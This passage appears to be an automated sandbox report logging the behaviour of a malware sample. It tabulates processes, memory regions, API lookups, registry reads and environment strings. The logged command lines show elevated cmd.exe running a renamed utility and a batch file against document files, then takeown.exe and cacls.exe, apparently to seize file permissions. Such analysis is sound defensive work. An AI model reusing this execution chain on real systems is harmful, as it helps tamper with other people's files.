| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x74f5a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x776e40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x776dd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x776decf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x74f65720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x776de140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x776deb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77719990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77715540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77709dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x74f5a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x74f80a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x752c0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x74f5f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x74f5fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x74f81030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x74f5a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x74f814b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x74f5a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x74f816f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x74f59970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x75243c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x74f58710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x74f596e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-01-23 14:12:56 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #199: cmd.exe
54
0
| Information | Value |
|---|---|
| ID | #199 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c qRY2vco2.exe -accepteula "To_Do_List.jtp" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:20, Reason: Child Process |
| Unmonitor | End Time: 00:03:33, Reason: Self Terminated |
| Monitor Duration | 00:00:13 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xe20 |
| Parent PID | 0x51c (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
A0C
0x
274
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000120000 | 0x00120000 | 0x0013ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000120000 | 0x00120000 | 0x0012ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000130000 | 0x00130000 | 0x0013ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000140000 | 0x00140000 | 0x00141fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000140000 | 0x00140000 | 0x00143fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000150000 | 0x00150000 | 0x00163fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x001affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x002affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000002b0000 | 0x002b0000 | 0x002b3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000002c0000 | 0x002c0000 | 0x002c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x002d1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x002e0000 | 0x0039dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000003a0000 | 0x003a0000 | 0x003dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003e0000 | 0x003e0000 | 0x003e3fff | Private Memory | rw |
|
|
|
- |
| cmd.exe | 0x003f0000 | 0x0043ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000440000 | 0x00440000 | 0x0443ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004440000 | 0x04440000 | 0x0453ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004570000 | 0x04570000 | 0x0457ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004580000 | 0x04580000 | 0x0474ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x04750000 | 0x04a86fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ee50000 | 0x7ee50000 | 0x7ef4ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ef50000 | 0x7ef50000 | 0x7ef72fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ef75000 | 0x7ef75000 | 0x7ef75fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ef77000 | 0x7ef77000 | 0x7ef79fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ef7a000 | 0x7ef7a000 | 0x7ef7cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ef7d000 | 0x7ef7d000 | 0x7ef7dfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Get Info | qRY2vco2.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
4 | |
| Open | STD_INPUT_HANDLE | - |
|
2 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 176, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe | os_pid = 0xb38, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x3f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x74f82780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x74f5fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x752a35c0 |
|
1 |
Environment (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #200: cmd.exe
290
0
| Information | Value |
|---|---|
| ID | #200 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" "C:\Program Files\Windows Journal\Templates\Shorthand.jtp"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:21, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:41 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x8e0 |
| Parent PID | 0xa70 (c:\users\ciihmnxmn6ps\desktop\mngrxc.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
C94
0x
F24
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x003f0000 | 0x0043ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x00000000009c0000 | 0x009c0000 | 0x049bffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00000000049c0000 | 0x049c0000 | 0x049dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000049c0000 | 0x049c0000 | 0x049cffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000049d0000 | 0x049d0000 | 0x049dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000049e0000 | 0x049e0000 | 0x049e1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000049e0000 | 0x049e0000 | 0x049e3fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000049f0000 | 0x049f0000 | 0x04a03fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004a10000 | 0x04a10000 | 0x04a4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004a50000 | 0x04a50000 | 0x04b4ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004b50000 | 0x04b50000 | 0x04b53fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004b60000 | 0x04b60000 | 0x04b60fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004b70000 | 0x04b70000 | 0x04b71fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b80000 | 0x04b80000 | 0x04bbffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004bc0000 | 0x04bc0000 | 0x04bc3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004bd0000 | 0x04bd0000 | 0x04bdffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c10000 | 0x04c10000 | 0x04c1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c20000 | 0x04c20000 | 0x04e9ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04c20000 | 0x04cddfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004da0000 | 0x04da0000 | 0x04e9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ea0000 | 0x04ea0000 | 0x04f9ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x04fa0000 | 0x052d6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x741b0000 | 0x741b7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f1f0000 | 0x7f1f0000 | 0x7f2effff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f2f0000 | 0x7f2f0000 | 0x7f312fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f316000 | 0x7f316000 | 0x7f318fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f319000 | 0x7f319000 | 0x7f31bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f31c000 | 0x7f31c000 | 0x7f31cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f31f000 | 0x7f31f000 | 0x7f31ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (217)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
32 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | - | type = file_type |
|
3 | |
| Open | STD_OUTPUT_HANDLE | - |
|
107 | |
| Open | STD_INPUT_HANDLE | - |
|
6 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
12 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
5 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 84 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 63 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 20 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 37 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 58 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 12 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 120, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (3)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cacls.exe | os_pid = 0xed4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\takeown.exe | os_pid = 0xae0, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | cmd.exe | - |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x3f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x74f82780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x74f5fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x752a35c0 |
|
1 |
Environment (43)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
12 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
5 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
6 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "Shorthand.jtp" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
2 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
2 | |
| Set Environment String | name = FN, value = "Shorthand.jtp" |
|
1 |
Process #201: qry2vco2.exe
175
0
| Information | Value |
|---|---|
| ID | #201 |
| File Name | c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe |
| Command Line | qRY2vco2.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:21, Reason: Child Process |
| Unmonitor | End Time: 00:03:27, Reason: Self Terminated |
| Monitor Duration | 00:00:06 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb68 |
| Parent PID | 0xb74 (c:\windows\system32\dllhost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
81C
0x
76C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x0020ffff | Private Memory | rw |
|
|
|
- |
